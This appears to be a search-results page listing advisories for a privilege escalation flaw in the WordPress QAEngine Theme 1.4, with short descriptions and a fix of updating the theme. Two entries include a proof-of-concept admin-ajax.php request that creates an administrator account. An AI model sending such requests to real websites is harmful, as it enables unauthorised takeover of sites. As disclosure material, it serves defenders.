5 matches found
WordPress QAEngine Theme 1.4 Privilege Escalation
Theme Link: https://www.enginethemes.com/themes/qaengine/ - Vulnerability Description: + 1st Vulnerability: qaengine vulnerability allows an attacker to have an administrator account on the target's website vuln code in /qaengine/includes/aecore/class-ae-users.php: public function insert...
WordPress QAEngine Theme Privilege Escalation Vulnerability
qaengine vulnerability allows an attacker to have an administrator account on the target's website ------------------------------------------------------------------------------ WordPress QAEngine Theme Privilege Escalation...
QAEngine Theme - Privilege Escalation
QAEngine vulnerability allows an attacker to have an administrator account on the target's website. http://www.example.com/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&userlogin=xADMIN&userpass=xPASS&role=administrator...
QAEngine Theme - Privilege Escalation
QAEngine vulnerability allows an attacker to have an administrator account on the target's website. PoC http://www.example.com/wp-admin/admin-ajax.php?action=ae-sync-user=createlogin=xADMINpass=xPASS=administrator...
WordPress QAEngine Theme - Privilege Escalation
Because of this vulnerability, the attackers can have an administrator account on the target's website. Solution Update the theme...